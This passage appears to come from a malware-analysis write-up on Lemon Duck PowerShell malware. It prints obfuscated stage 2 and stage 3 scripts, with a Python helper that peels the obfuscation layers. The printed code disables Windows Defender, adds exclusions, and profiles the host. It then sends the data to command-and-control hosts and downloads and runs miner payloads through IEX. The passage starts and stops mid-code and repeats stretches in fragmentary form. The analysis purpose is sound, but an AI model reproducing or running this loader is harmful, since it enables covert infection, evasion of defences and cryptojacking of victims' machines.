F2Emip=F2Eobj.connect'+'io'+'n.ip
ZmI+ZmI
Z'+'mI+Z'+'mIF2Emhr=F2Eobj.hashrate.tZmI+ZmIotal-join(E2D,E2D'+')}catch{}

try{

Set-MpPrefeZmI+ZmIrence -DisableRZmI+ZmIealtimeMonitoring 1

Add-MpPre'+'ference -ExclusionPath c:q5E

Add-MpPreference -ExclusiZmI+ZmIonProcess c:q5Ewindowsq5Esystem32q5EWindowsPowerShellZmI+ZmIq5Ev1.0q5EpZmI+ZmIowershell.exeZmI+ZmI

    Add-MZmI+ZmIpPreference -ExclusionProcess c:q5Ew'+'indowsq5Esystem32q5ZmI+ZmIEWindowsPoweZmI+ZmIrShellq5Ev1.0q5EF2EreZmI+ZmIname

ZmI+ZmI}'+'catch{}
ZmI+ZmI
i'+'f((F2Ecar'+'d'+' -match ZmI+ZmIJGAGTXWdnNVIDIAWdnGEFORCEJGA)){F2Eisn=1}

if((F2Ecard -match JGARadeonWdnAMDJGA)){F2Eisa=1}

F2Ev=F2Eurl.split(JGA?JGA)[1]

F2Eparams'+'=@(F2Ev,F2Ecomp_name,F2EguiZmI'+'+ZmId,F2Emac)-joinJGA&JGA



set-locaZmI+'+'ZmItion F2Eenv:tmp

functZmI+ZmIion sZmI+ZmItp(F2E'+'gra){

    write-host '+'FZmI+ZmI2Egra

Start-Process -File'+'Path cmd.exe -ArgumentLi'+'st JGA/c F2EgraJGA

}

function gcf(F2ZmI+Zm'+'IEcode,F2Emd,F2Efn){

('+'E'+'2Decho E2D+F2Ecode+E2'+'D;F2Eifmd5=E2DE2DE2D+F2Emd+E2DE2DE2D;F2Eifp=F2'+'Eenv:tmp+EZmI+ZmI2DE2Dq5EE2D+F2Efn+E2DE2DE2D;F2Edown_url=ZmI+ZmIE2DE2DEZmI+ZmI2D+F2EdowZmI+'+'ZmIn_url+E2DE2'+'DE2DZmI+ZmI;function gmd5(F2Econ){[System.Security.Cryptography.MD5]::Create().C'+'omput'+'eHash(F2EZmI+ZmIcon)Wdnforeach{F2Es+=F2E_.ToString(E2DE2Dx2E2DE2D)};r'+'eturn F2ZmI+ZmIEs}if(test-path F2Eifp){F2Econ_=[System.IO.File]::ReadAllBytes(F2Eifp)'+';F2Emd'+'5_=gmd5 F2Econ_;if(F2Emd5_-eqF2Eifmd5){F2Enoup'+'=1}}if(!F2Enoup){F2Econ=(Ned0xw-Objd0xect NetZm'+'I+ZmI.WebCd0xlient).downloaddata(ZmI+ZmIF2Edown_u'+'rl+E2DZ'+'mI+ZmIE2D/E2D+F2Efn+E2D?E2D+F2Epara'+'ms'+'+E2DE2DE2D);F2Et=gmd5 F2Econ;if(F2Et'+'-eqF2Eifmd5){[System'+'.IO.Fil'+'e]::WriteAZmI+ZmIllBytes(F2Eifp,F2Econ)}elZmI'+'+ZmIse{F2Enoup=1}ZmI+ZmI}if(ZmI'+'+Z'+'mIF2Enoup){F2Econ=F2Eco'+'n_;F2Eifmd5=F2Emd5_}E2D).replace(E2DW'+'dnE2D,E2D^^^WdnE2D).replac'+'e(E2D&E2D,E2D^^^&E2DZmI+ZmI'+')

}

function gpa(F2Efnam,F'+'2Ename){

(E2Dfor(F2EiZmI+'+'ZmI=0;F2Ei -lt F2Econ.co'+'untZmI+Zm'+'I-1;F2Ei+=1){if(F2E'+'con[F2Ei] -eq '+'0x0'+'a){breaZmI+ZmIk}};id0xex(-join[char[]]'+'F2Ec'+'on[0..F2Ei]);F2Ebin=(NewZmI+ZmI-Object IO.B'+'inaryReader(New-Object System.IO.CoZmI+ZmImpression'+'.GzipStream (New-ObZmI+ZmIje'+'ct System.IO.MemoryS'+'tream(,F2Econ[(F2Ei+1)..(F2Econ.count)])), Zm'+'I+ZmI([IO.Compr'+'ession.CompressionMode]::Decompress))).ReadBytes(10000000)ZmI+ZmI;F2Ebin_=F2Ebin.Clone();F2Emep=F2Een'+'v:tmp+ZmI+ZmIE2DE2DE2D+JGAZmI+ZmIq5EF2Efnam.oriJGA+E2DE2DE2D;[System.IO.File]::Wr'+'iteAllByt'+'es(F2Emep,F2Ebin_+(('+'1..127)WdnGet-Random -Count 100));test1'+' -PEBytes F2EbinE2D'+').replace(E2DWdnE2D,E2D^^^WdnE2D'+')'+'.re'+'place(E2D&ZmI+ZmIE2D'+',E2D^^^&E2D)+JGAWdnFZmI+ZmI2Ename - &cmd /c copy /y %tmpZmI+ZmI%q5EF2Efnam.ori %tmp%q5EF2Efnam.exe & %tmp%q5EF2Efnam.exeJGA

}

'+'funcZmI+ZmItion gpb(F2EnameZ'+'mI+ZmI){

'+'    E2DId0'+'xEX(-join[char[]]F2Econ)W'+'dnE2D+F2Ename'+'+E2D -E2D

}

function gcode(F2Efl) '+'{

E2Dtry{F2ElocalE2D+F2Efl+E2D=F2Efl'+'ase;N'+'ew-Object Threading.Mutex(F2Etrue,E2DE2DGlobalq5EeLocal'+'E2D+F2Efl+E2DE2DE2D,[ref]F2ElocalE2D+F2Efl+'+'E2D)}catch{}E2D

}

F2E'+'ZmI+ZmIcode1'+'=gcode JGAIfJGA

Id0xEx F2Ecode1

if(F2ElocalIf){

stZmI+ZmIp ((gcf F2Ecode1 F2EifmdZmI+ZmI5 F2Eifbin)+(gpb F2Erename))

}

i'+'f(F2Eis64){

F2EZmI+ZmIc'+'ZmI+ZmIode2=gcode JGATMnJGA

Id0xEx F2Ecode2

ifZm'+'I+ZmI(F2'+'ElocalTMn){

stp ((gcf F2Ecode2 F2Em'+'mZmI+ZmId5 F2Embin)+(g'+'p'+'a F2Embin'+' F2E'+'rename))

'+'}

}

'+'if((F2Eisn -or F2Eisa) -and F2Eis64){
'+'
F2Ecode3=gcode JGATMngJGZmI+ZmIA

Id0xEx F'+'2Ecode3

if(F2ElocalTMng){

stp ((gcf F2Ecode3 F2Emgmd5 F2Emgbin)+(gpa F2Emg'+'binZmI+ZmI F2Ere'+'name))

}

}

F2Ecode4=gcod'+'ZmI+ZmIe JGAKrJGA

Id0xE'+'x F2Ecode4

if'+'(F2El'+'ocalK'+'r){

stp ((gcf F2Ecode4 F2Ekrmd5 F2Ekrbin)+(gpb ZmI+ZmIF2Erename))

}

stp (ZmI+ZmIE2Decho try{F2E'+'s=[System.NeZ'+'mI+ZmIt'+'.Sockets'+'.TcpListener]65529;'+'F2Es.start();while(1){}}catch{}Wd'+'nE2D+F2ErenZmI+ZmIame+E2D -E2D)


F2E'+'conf_f=test-pa'+'th c:q5Ewindowsq5Esystem32q5EWindowsPowerShZmI+ZmIellq5Ev1.0q5EconfiZmI+ZmIgXXX1'+'.'+'json

F2'+'Elmip=[System'+'.Net.Dns]::GetHo'+'stAddresses(JGAp.b69'+'kq.comJGA) Wdn foreach {echo F2E_.IPAddressToString }

F2Etpid,F2Etpna'+'me=(ge'+'ZmI+Z'+'mIt-ZmI+ZmIprocessWdnsort cpu -Des'+'cendinZmI+ZmI'+'gWdnselect-objectZmI+ZmI -first'+' 1WdnforeZmI+ZmIach{F2E_.id,FZmI+ZmI2E_.processnam'+'e})

F2Etcpconn = NetStat -anop'+' TCP

F2Eipport=JGAJGA

foreach(F2Et in F2Etcpconn){

    F2Elin'+'e = F2Et.'+'sZmI+ZmIplit(E2D E2D)Wdn ? {F2E'+'_}

    if'+' (F2ElineZ'+'mI+ZmI -eq FZmI+ZmI2Enull) '+'{ continue }

 '+'   if(F2Et.contains(JGAESTABLISHEDJGA) -and (F2Eline[-1] -eq F2'+'Etpid)){

        F2Eipport = F2Eline[2]

        break'+'

    }

}

try{(get-wmiobject -class win32_networkadapterconfiguration -filter ipenabled=true).SetDNSServerSearchOrder'+'(@(E2DZmI+ZmI8.8.8.8E2D,ZmI+ZmIE2'+'D'+'9.9'+'.9.9'+'E2D))}catch{}

F2EparZmI+ZmIams+=J'+'GA'+'&JGA+(@(FZmI+ZmI2Eos,[Int]F2Eis64,F2EZmI+ZmIuser,F2Edomain,F2EZmI+ZmIdrive,F2Ecpuname,F2Ec'+'ardZmI'+'+ZmI,F2Emem,F2Ecpu'+'_per,[InZmI+ZmItZmI+ZmI]F2Epermi'+'t,(ZmI+ZmIF2Elifmd5ZmI+ZmI[0..5]'+'-joZmI+ZmIinJGAJGA),(F2Elmmd5[ZmI+ZmI0..5]-joinJGAJGA),(F2Elk'+'rmdZmI+ZmI5[0..ZmI+ZmI5]-joinJGAJGA),F2ZmI+ZmIEmv,F2Emip,F2EmhrZmI+ZmI,F2EuptimZmI+Z'+'mIe,[Int]F2'+'Ec'+'onf_f,F2Elmip,F2EtpnaZmI+ZmIme,F2Eip'+'port,JGA0.9JGA)-joinJGA&JGA)

function SIEX {  

Param(

[string]F2Eurl

)

try{

F2Ewebclient = Ned0xw-Objd0xect Net.WebCd0xlient

F2Efinalurl ='+' JGAF2EurlJGA+JGA?JGA+JGAF2Eparam'+'sJGA

ZmI+ZmItry{

F2EwebclientZmI+ZmI.Headers.add(JGAUser-AgentJGA,JGALemon-Duck-JGA+F2ELemon_Duck.reZmI+ZmIplace(E2DZmI+ZmIq5EE2D,E2D-E2'+'D))

} catch{}

F2Eres_bytes = F2Ewebclient.DownloadData(ZmI+ZmIF2Efinalurl)

if(F2Eres_bytes.count -gt 173){

F2Esign_bytes = F2EresZmI+ZmI_bytes[0..171];

ZmI+Zm'+'IF2Eraw_byteZmI+ZmIs = F2Eres_bytes'+'[173..F2Eres_bytes.count];

'+'F2ZmI'+'+ZmIErsaParams'+' ='+' New-Object System.Security.C'+'rypt'+'ographZm'+'I+ZmIy.RSAParameters

F2Er'+'sa'+'Params.Modulus = '+'0xda,0x65,0xa8,0xdZmI+ZmI7,0xbb,0x97,0xbc,0x6d,0x41,0x5e,0x99,0x9d,0x82,Z'+'mI+ZmI0'+'xff,0x'+'2f,0xff,0x73,0x53,0x9a,0x73,0x6e,0x6c,0x7b,0x55,'+'0xeb,0x67,0xd6,0xae,0x4e,0x23,0x3c,0x52,0x3d,0xc0,0xcd,'+'0xcd,'+'0x37,0x6b,0xf3,0'+'x4f,0x3b,0x62,0x70,0x86,0x07'+',0x96,0x6e,0xca,0xde,0xbd,0xa6,0x4f,0xf6,0x11,0xd1,0x60,0xd'+'c,0x88,0xbf,0x35,0xf2,0x92,0xee'+',0x6c,0xb8,0x2e,0x9b,0x7d,0x2b,0xZmI+ZmId1,0x'+'19,0x'+'30,0x73,0xc6,0x52,0x01,0xcd,0'+'xe7,0xc7,0xZmI+ZmI34,0x78,0x8a,0xa7,0x9f,0xe2,0x12,0'+'xcd,0x79,0x40,0xa7,0x91,0x6a,0x'+'ae,0x95,0'+'x8e,0x42,0xd0,0xcf,0x39,0x6e,0x30,0xcb,0x0a'+',0x98,0xdb,0x97,0x3f,0xf6ZmI+ZmI,0x2e,0x95,0x10,0x'+'72,0xfd,0x63,0xd5,0xf7,0x88,0x63,0xa4,0x7b,0xae,0x97,0xZmI+ZmIea,0x38,0xb7,0x47,0x6b,0x5d

F2ErZmI+ZmIsaParams'+'.ExponZmI+ZmIent = 0x01,0x00,0x01

F2ErsZmI+ZmIa = New-Object -TyZmI+ZmIpeName System.Security.Cryptography.RSACryptoS'+'erviceProvider;

F2Ersa.ImportPZmI+ZmIarameters(F2'+'ErsaParams)
'+'
FZm'+'I+ZmI2EbasZmI+ZmIe64 = -join([cha'+'r[]]F2EZmI+ZmIsign_bytes)

F2EbyteArray = [convert]::FromBase64Stri'+'ng(F'+'2Ebase64)

F2Esha1 = New-Object Sys'+'t'+'ZmI+ZmIem.SecuZmI+ZmIrity.Cryptography.SH'+'A1CryptoServi'+'ceProvider

if(F2Ersa.verifyData(F'+'2'+'Eraw_bytes,F2Esha1,F2EbyteArray)) {

IZmI'+'+ZmIEX (-jo'+'in[char[]]F2Eraw_bytes)

}

}

} c'+'atch{}

}

StartZmI+ZmI-Sleep -Seconds 3

SIEX JGAF2Ecore_url/report.jspJGA


Zm'+'I)-rEplAcE ([cHaR]87+[cHaR]100+'+'[cHaR]110),[cHaR]124 -rEplAcEZmIE2DZmI,[cHaR]39 -r'+'EplAcE ([cHaR]70+[cHaR]50+'+'[cHaR]69),[cHaR]36-c'+'rEPLAcE([cHaR]100+[cHaR]4'+'8+[cHaR'+']12'+'0),[cHaR]96-crEPLAcEZmIJGAZmI,'+'[cHaR]34 -rEplAcE ([cHa'+'R]113+[cHaR]'+'53+[cHaR]69),[cHaR]92) ) 

')  -CRePlACE 'ZmI',[chaR]39 -repLACE 'EwT',[chaR]36))  

We got some familiar-looking code, but it is still obfuscated, so let’s deobfuscate the code again.
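All three layers can be peeled statically, with no PowerShell involved. Stage 1 stores the next stage as a reversed character array (`[Array]::Reverse($k8n3D)`), joins it with `$OFS` set to the empty string and runs it through `$ShellId[1]+$ShellId[13]+'x'`, which spells `iex` because `$ShellId` is `Microsoft.PowerShell`. The last line of the stage 2 listing then applies `-creplace 'ZmI',[char]39` and `-replace 'EwT',[char]36` to a big single-quoted literal, and the line before it carries the inner chain that turns the stage 3 literal into clear text: `Wdn`→`|`, `E2D`→`'`, `F2E`→`$`, `d0x`→`` ` ``, `JGA`→`"`, `q5E`→`\`. Its invoker, `([string]$VerbosePreference)[1,3]+'x'`, is again `iex` (from `SilentlyContinue`). The Python below is an added example, not code from the original post or from the malware: it reverses the array, strips the `'+'` concatenation seams, applies the outer substitutions, strips the second set of seams that the former `ZmI+ZmI` fragments become, and applies the inner chain, carrying the text one step further than the stage 3 listing above (which still shows the `F2E`/`JGA` tokens and `'+'` seams). The replacement map is taken from the script itself; PowerShell `-replace` is a case-insensitive regex and `-creplace` a case-sensitive one, which the code mirrors. The sample input is constructed for the test and is not the real blob.

```python
import re

# Outer layer: the two operators on the last line of the stage 2 listing,
# applied after the reversed char array has been joined back into a string.
OUTER_LAYER = [
    ("ZmI", "'", True),    # -creplace 'ZmI',[char]39 (case-sensitive)
    ("EwT", "$", False),   # -replace  'EwT',[char]36
]

# Inner layer: the -replace/-creplace chain on the line before it.
INNER_LAYER = [
    ("Wdn", "|", False),   # [char]87+[char]100+[char]110 -> [char]124
    ("E2D", "'", False),   # -> [char]39
    ("F2E", "$", False),   # [char]70+[char]50+[char]69   -> [char]36
    ("d0x", "`", True),    # -creplace, -> [char]96
    ("JGA", '"', True),    # -creplace, -> [char]34
    ("q5E", "\\", False),  # [char]113+[char]53+[char]69  -> [char]92
]

# Inside the big literal a real apostrophe is always written as E2D, so every
# '+' is a concatenation seam ('abc'+'def') and can be dropped outright.
CONCAT_SEAM = "'+'"


def strip_seams(text: str) -> str:
    """Remove the 'abc'+'def' concatenation seams of a split string literal."""
    return text.replace(CONCAT_SEAM, "")


def apply_layer(text: str, layer) -> str:
    """Apply one -replace/-creplace chain in order.

    A function replacement is used so that '\\' and '$' reach the output
    literally instead of being parsed as regex backreferences.
    """
    for token, replacement, case_sensitive in layer:
        flags = 0 if case_sensitive else re.IGNORECASE
        text = re.sub(re.escape(token), lambda _m, r=replacement: r, text, flags=flags)
    return text


def peel(reversed_blob: str) -> str:
    """Turn the stage 1 character array into clear PowerShell text."""
    text = reversed_blob[::-1]             # [Array]::Reverse($k8n3D)
    text = strip_seams(text)               # seams of the big outer literal
    text = apply_layer(text, OUTER_LAYER)  # ZmI+ZmI now reads '+'
    text = strip_seams(text)               # drop that second set of seams
    return apply_layer(text, INNER_LAYER)  # the chain the stage 3 literal goes through


# Constructed sample in the same token scheme (not the real blob), stored
# reversed exactly as stage 1 stores its character array.
_FORWARD = (
    "F2Eis64=[int]([IntPtr]:Zm'+'I+ZmI:Si'+'ze -eq 8);"
    "F2Eenames = gci JGAF2Erpathq5E*JGA -Include *'+'.exe Wdn foreach{F2E_.name};"
    "Wrd0xite-Host JGAokJGA"
)
SAMPLE_REVERSED = _FORWARD[::-1]

EXPECTED = (
    '$is64=[int]([IntPtr]::Size -eq 8);'
    '$enames = gci "$rpath\\*" -Include *.exe | foreach{$_.name};'
    'Wr`ite-Host "ok"'
)


if __name__ == "__main__":
    # With the real stage 1 array pasted in (inside the sandbox VM), this prints
    # the clear-text script for reading, never for execution.
    print(peel(SAMPLE_REVERSED))
```

Running the layers one at a time, rather than all at once, is what makes the `ZmI+ZmI` trick visible: those fragments only become `'+'` seams after the outer substitution, which is why the seam stripping has to be done twice.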

Stage 3

The deobfuscated code we now have is this ⬇️,

( (('F2Eis64=[int]([IntPtr]:'+':Size -eq 8)

F2Eifbin=JGAif.binJGA

F2Eifmd5=JGA04f9fd'+'d312702343f0'+'74e5dd9a1ffe6fJGA

F2Ekrbin=JGAkr.binJGA

F2Ekrmd5=JGAb7a1cfd74661361f71856388dac5aaa6JGA

if(F2Ei'+'s64){

F2Embin=JGAm6.binJGA

F2Emmd5=JGA32390a001e1207eafdd66e35c5'+'5aa9d3JGA

F2Emgbin=JGAm6g.binJGA

F2Emgmd5=JGA26c0d79a29223e96ae52cb2775c96813JGA

}

function gmd5(F2Ed){

[Security.Cryptography'+'.MD5]::Create().ComputeHash(F2Ed)Wdnforeach{F2El+=F2E_.ToString(E2Dx2E2D)}

'+'return F2El

}

function getrname(){

    F2Erpath=JGAC:q5EWindowsq5ES'+'ystem32q5EWindowspowershellq5EV1.0JGA

    F2Eenames = gci JGAF2Erpathq5E*JGA -Include *.exe -Exclude powershell.exeWdnforeach{F2E_.name}

    F2Etmd'+'5 = gmd5 ([IO.File]::ReadAllBytes(JGAF2Erpathq5Epowershell.exeJGA))

   '+' foreach(F2Eename in F2Eenames){

 '+'       F2Emd5_=gm'+'d5 ([IO.File]::ReadAllBytes(JGAF2Erpathq5EF2EenameJGA))

        if(F2Etmd5 -eq F2Emd5_){

    '+'        return F2E'+'ename'+'

        }

    }

    F2Eename=-join([char[]](48..57+65..90+97..12'+'2)WdnGet'+'-Random -Count (6+(Get-Random)%6)) + JGA.exeJGA

    copy-item JGAF2E'+'rpathq5Epowershe'+'ll.exeJGA JGAF2Erpathq5EF2EenameJGAWdnout-null

    if(!(test-path '+'JGAF2Erpathq5EF2EenameJGA)){F2Eename=JG'+'Apo'+'wershell.exeJGA}

    return'+' F2Eename

}

F2Erename=getrname

F2Elifmd5,F2Elmmd5,F2'+'Elkrmd5=JGAJGA,JGAJGA,JGAJGA

try{F2Elifmd5=gmd5 ([IO.File]::ReadAllBytes(JGAF2Eenv:tmpq5EF2EifbinJGA))}catch{}

try{F'+'2Elmmd5=gmd5 ([IO.File]::ReadAllBytes(JGAF2Eenv:tmpq5EF2EmbinJGA))}catch{}

try{F2Elkrmd5=gmd5'+' ([IO.File]::ReadAl'+'lByt'+'es(JGAF2Ee'+'n'+'v:t'+'mpq5EF2EkrbinJGA))}catch{}




F2Edown_url = JGAhttp://d.u78wjd'+'u.'+'comJGA

if(!F2Eurl){F2Eurl=JGAhttp://t.bb3u9.comJGA}

F2Ecore_url = F2Eurl.split(JGA/JGA)[0..2]-joinJGA/JGA


F2Epermit = ([Security.Principal.WindowsPrincipal][Security.P'+'rincipal.WindowsIdentity]::GetCur'+'rent()).IsInRole([Security.Principal.W'+'indowsBuiltInRole'+'] JGAAdministratorJGA)

F2Ecomp_name = F2Eenv:COMPUTERNAME

F2Eguid = (get-wmiobject Win32_ComputerSyste'+'mProduct).UUID

F2Emac = (Get-WmiObject Win32_NetworkAdapterConfigur'+'ati'+'on Wdn where {F2E_.ipenabled -EQ F2Etrue}).Macaddress Wdn select-object -firs'+'t 1

F'+'2Eosb = (Get-Wm'+'iObject -class Win32_OperatingSystem)

F2Eos = F2Eosb.Caption.replace(J'+'GAMicrosoft Windows JGA,JGAJ'+'GA)+JGA_JGA+F2Eosb.Version

F2Euser = F2Eenv:USERNAME

'+'F2Edomain = (Get-WmiObjec'+'t win32_comput'+'ersyst'+'em).Domain

F2Euptime = [timespan]::FromMilliseconds([environment]::TickCount)Wdnforeach{F2E_.totalseconds}

F2Ecpuname = (get-wmiobject '+'win32_processor).name

F2Ecard = (Get-WmiObject Win32_VideoController).name

F2Ecpu_per = JGAF2E((Get-WmiObject'+' -'+'Class Win32_Pr'+'ocessor).LoadPercentage)JGA

gwmi Win32_Physical'+'Memory Wdn %{F2Emsum = 0} { F2Emsum += F2E_.Capacity };F2Emem=F2Em'+'sum/1Gb

try{

F2Edrive = ([system.IO.DriveInfo]::GetDrives('+') '+'Wdn where {F2E_.IsReady -and (F2E_.AvailableFreeSpace -gt 1024) -and ((F2E_.DriveType -'+'eq JGARemovableJGA) -or (F2E_.DriveType -eq JGANetworkJGA)) -and ((F2E_.DriveFormat -eq JGANTFSJGA) -or (F2E_.DriveFormat -eq JGAFAT32JGA))} Wdn foreach{(F2E_.Name)[0]+JGA_JGA+'+'(F2E_.Dr'+'iveType.tostring())[0]})-joinJGAWdnJGA}catch{}

try{

[Reflection.Assembly]::LoadWithPar'+'tialName(JGASystem.Web.Extension'+'sJGA)

F2Eobj = (New-Object Web.Script.Serialization.JavaScriptSerializer).DeserializeObject((ned0xw'+'-objd0xect net.webcd0xlient).JGAdownloadstring'+'JGA(E2Dhttp://127.0.0.1:43669/1/summaryE2D))

F2Emv=F2Eobj.version

F2Emip=F2Eobj.connection.ip
'+'
'+'F2Emhr=F2Eobj.hashrate.t'+'otal-join(E2D,E2D)}catch{}

try{

Set-MpPrefe'+'rence -DisableR'+'ealtimeMonitoring 1

Add-MpPreference -ExclusionPath c:q5E

Add-MpPreference -Exclusi'+'onProcess c:q5Ewindowsq5Esystem32q5EWindowsPowerShell'+'q5Ev1.0q5Ep'+'owershell.exe'+'

    Add-M'+'pPreference -ExclusionProcess c:q5Ewindowsq5Esystem32q5'+'EWindowsPowe'+'rShellq5Ev1.0q5EF2Ere'+'name

'+'}catch{}
'+'
if((F2Ecard -match '+'JGAGTXWdnNVIDIAWdnGEFORCEJGA)){F2Eisn=1}

if((F2Ecard -match JGARadeonWdnAMDJGA)){F2Eisa=1}

F2Ev=F2Eurl.split(JGA?JGA)[1]

F2Eparams=@(F2Ev,F2Ecomp_name,F2Egui'+'d,F2Emac)-joinJGA&JGA



set-loca'+'tion F2Eenv:tmp

funct'+'ion s'+'tp(F2Egra){

    write-host F'+'2Egra

Start-Process -FilePath cmd.exe -ArgumentList JGA/c F2EgraJGA

}

function gcf(F2'+'Ecode,F2Emd,F2Efn){

(E2Decho E2D+F2Ecode+E2D;F2Eifmd5=E2DE2DE2D+F2Emd+E2DE2DE2D;F2Eifp=F2Eenv:tmp+E'+'2DE2Dq5EE2D+F2Efn+E2DE2DE2D;F2Edown_url='+'E2DE2DE'+'2D+F2Edow'+'n_url+E2DE2DE2D'+';function gmd5(F2Econ){[System.Security.Cryptography.MD5]::Create().ComputeHash(F2E'+'con)Wdnforeach{F2Es+=F2E_.ToString(E2DE2Dx2E2DE2D)};return F2'+'Es}if(test-path F2Eifp){F2Econ_=[System.IO.File]::ReadAllBytes(F2Eifp);F2Emd5_=gmd5 F2Econ_;if(F2Emd5_-eqF2Eifmd5){F2Enoup=1}}if(!F2Enoup){F2Econ=(Ned0xw-Objd0xect Net'+'.WebCd0xlient).downloaddata('+'F2Edown_url+E2D'+'E2D/E2D+F2Efn+E2D?E2D+F2Eparams+E2DE2DE2D);F2Et=gmd5 F2Econ;if(F2Et-eqF2Eifmd5){[System.IO.File]::WriteA'+'llBytes(F2Eifp,F2Econ)}el'+'se{F2Enoup=1}'+'}if('+'F2Enoup){F2Econ=F2Econ_;F2Eifmd5=F2Emd5_}E2D).replace(E2DWdnE2D,E2D^^^WdnE2D).replace(E2D&E2D,E2D^^^&E2D'+')

}

function gpa(F2Efnam,F2Ename){

(E2Dfor(F2Ei'+'=0;F2Ei -lt F2Econ.count'+'-1;F2Ei+=1){if(F2Econ[F2Ei] -eq 0x0a){brea'+'k}};id0xex(-join[char[]]F2Econ[0..F2Ei]);F2Ebin=(New'+'-Object IO.BinaryReader(New-Object System.IO.Co'+'mpression.GzipStream (New-Ob'+'ject System.IO.MemoryStream(,F2Econ[(F2Ei+1)..(F2Econ.count)])), '+'([IO.Compression.CompressionMode]::Decompress))).ReadBytes(10000000)'+';F2Ebin_=F2Ebin.Clone();F2Emep=F2Eenv:tmp+'+'E2DE2DE2D+JGA'+'q5EF2Efnam.oriJGA+E2DE2DE2D;[System.IO.File]::WriteAllBytes(F2Emep,F2Ebin_+((1..127)WdnGet-Random -Count 100));test1 -PEBytes F2EbinE2D).replace(E2DWdnE2D,E2D^^^WdnE2D).replace(E2D&'+'E2D,E2D^^^&E2D)+JGAWdnF'+'2Ename - &cmd /c copy /y %tmp'+'%q5EF2Efnam.ori %tmp%q5EF2Efnam.exe & %tmp%q5EF2Efnam.exeJGA

}

func'+'tion gpb(F2Ename'+'){

    E2DId0xEX(-join[char[]]F2Econ)WdnE2D+F2Ename+E2D -E2D

}

function gcode(F2Efl) {

E2Dtry{F2ElocalE2D+F2Efl+E2D=F2Eflase;New-Object Threading.Mutex(F2Etrue,E2DE2DGlobalq5EeLocalE2D+F2Efl+E2DE2DE2D,[ref]F2ElocalE2D+F2Efl+E2D)}catch{}E2D

}

F2E'+'code1=gcode JGAIfJGA

Id0xEx F2Ecode1

if(F2ElocalIf){

st'+'p ((gcf F2Ecode1 F2Eifmd'+'5 F2Eifbin)+(gpb F2Erename))

}

if(F2Eis64){

F2E'+'c'+'ode2=gcode JGATMnJGA

Id0xEx F2Ecode2

if'+'(F2ElocalTMn){

stp ((gcf F2Ecode2 F2Emm'+'d5 F2Embin)+(gpa F2Embin F2Erename))

}

}

if((F2Eisn -or F2Eisa) -and F2Eis64){

F2Ecode3=gcode JGATMngJG'+'A

Id0xEx F2Ecode3

if(F2ElocalTMng){

stp ((gcf F2Ecode3 F2Emgmd5 F2Emgbin)+(gpa F2Emgbin'+' F2Erename))

}

}

F2Ecode4=gcod'+'e JGAKrJGA

Id0xEx F2Ecode4

if(F2ElocalKr){

stp ((gcf F2Ecode4 F2Ekrmd5 F2Ekrbin)+(gpb '+'F2Erename))

}

stp ('+'E2Decho try{F2Es=[System.Ne'+'t.Sockets.TcpListener]65529;F2Es.start();while(1){}}catch{}WdnE2D+F2Eren'+'ame+E2D -E2D)


F2Econf_f=test-path c:q5Ewindowsq5Esystem32q5EWindowsPowerSh'+'ellq5Ev1.0q5Econfi'+'gXXX1.json

F2Elmip=[System.Net.Dns]::GetHostAddresses(JGAp.b69kq.comJGA) Wdn foreach {echo F2E_.IPAddressToString }

F2Etpid,F2Etpname=(ge'+'t-'+'processWdnsort cpu -Descendin'+'gWdnselect-object'+' -first 1Wdnfore'+'ach{F2E_.id,F'+'2E_.processname})

F2Etcpconn = NetStat -anop TCP

F2Eipport=JGAJGA

foreach(F2Et in F2Etcpconn){

    F2Eline = F2Et.s'+'plit(E2D E2D)Wdn ? {F2E_}

    if (F2Eline'+' -eq F'+'2Enull) { continue }

    if(F2Et.contains(JGAESTABLISHEDJGA) -and (F2Eline[-1] -eq F2Etpid)){

        F2Eipport = F2Eline[2]

        break

    }

}

try{(get-wmiobject -class win32_networkadapterconfiguration -filter ipenabled=true).SetDNSServerSearchOrder(@(E2D'+'8.8.8.8E2D,'+'E2D9.9.9.9E2D))}catch{}

F2Epar'+'ams+=JGA&JGA+(@(F'+'2Eos,[Int]F2Eis64,F2E'+'user,F2Edomain,F2E'+'drive,F2Ecpuname,F2Ecard'+',F2Emem,F2Ecpu_per,[In'+'t'+']F2Epermit,('+'F2Elifmd5'+'[0..5]-jo'+'inJGAJGA),(F2Elmmd5['+'0..5]-joinJGAJGA),(F2Elkrmd'+'5[0..'+'5]-joinJGAJGA),F2'+'Emv,F2Emip,F2Emhr'+',F2Euptim'+'e,[Int]F2Econf_f,F2Elmip,F2Etpna'+'me,F2Eipport,JGA0.9JGA)-joinJGA&JGA)

function SIEX {  

Param(

[string]F2Eurl

)

try{

F2Ewebclient = Ned0xw-Objd0xect Net.WebCd0xlient

F2Efinalurl = JGAF2EurlJGA+JGA?JGA+JGAF2EparamsJGA

'+'try{

F2Ewebclient'+'.Headers.add(JGAUser-AgentJGA,JGALemon-Duck-JGA+F2ELemon_Duck.re'+'place(E2D'+'q5EE2D,E2D-E2D))

} catch{}

F2Eres_bytes = F2Ewebclient.DownloadData('+'F2Efinalurl)

if(F2Eres_bytes.count -gt 173){

F2Esign_bytes = F2Eres'+'_bytes[0..171];

'+'F2Eraw_byte'+'s = F2Eres_bytes[173..F2Eres_bytes.count];

F2'+'ErsaParams = New-Object System.Security.Cryptograph'+'y.RSAParameters

F2ErsaParams.Modulus = 0xda,0x65,0xa8,0xd'+'7,0xbb,0x97,0xbc,0x6d,0x41,0x5e,0x99,0x9d,0x82,'+'0xff,0x2f,0xff,0x73,0x53,0x9a,0x73,0x6e,0x6c,0x7b,0x55,0xeb,0x67,0xd6,0xae,0x4e,0x23,0x3c,0x52,0x3d,0xc0,0xcd,0xcd,0x37,0x6b,0xf3,0x4f,0x3b,0x62,0x70,0x86,0x07,0x96,0x6e,0xca,0xde,0xbd,0xa6,0x4f,0xf6,0x11,0xd1,0x60,0xdc,0x88,0xbf,0x35,0xf2,0x92,0xee,0x6c,0xb8,0x2e,0x9b,0x7d,0x2b,0x'+'d1,0x19,0x30,0x73,0xc6,0x52,0x01,0xcd,0xe7,0xc7,0x'+'34,0x78,0x8a,0xa7,0x9f,0xe2,0x12,0xcd,0x79,0x40,0xa7,0x91,0x6a,0xae,0x95,0x8e,0x42,0xd0,0xcf,0x39,0x6e,0x30,0xcb,0x0a,0x98,0xdb,0x97,0x3f,0xf6'+',0x2e,0x95,0x10,0x72,0xfd,0x63,0xd5,0xf7,0x88,0x63,0xa4,0x7b,0xae,0x97,0x'+'ea,0x38,0xb7,0x47,0x6b,0x5d

F2Er'+'saParams.Expon'+'ent = 0x01,0x00,0x01

F2Ers'+'a = New-Object -Ty'+'peName System.Security.Cryptography.RSACryptoServiceProvider;

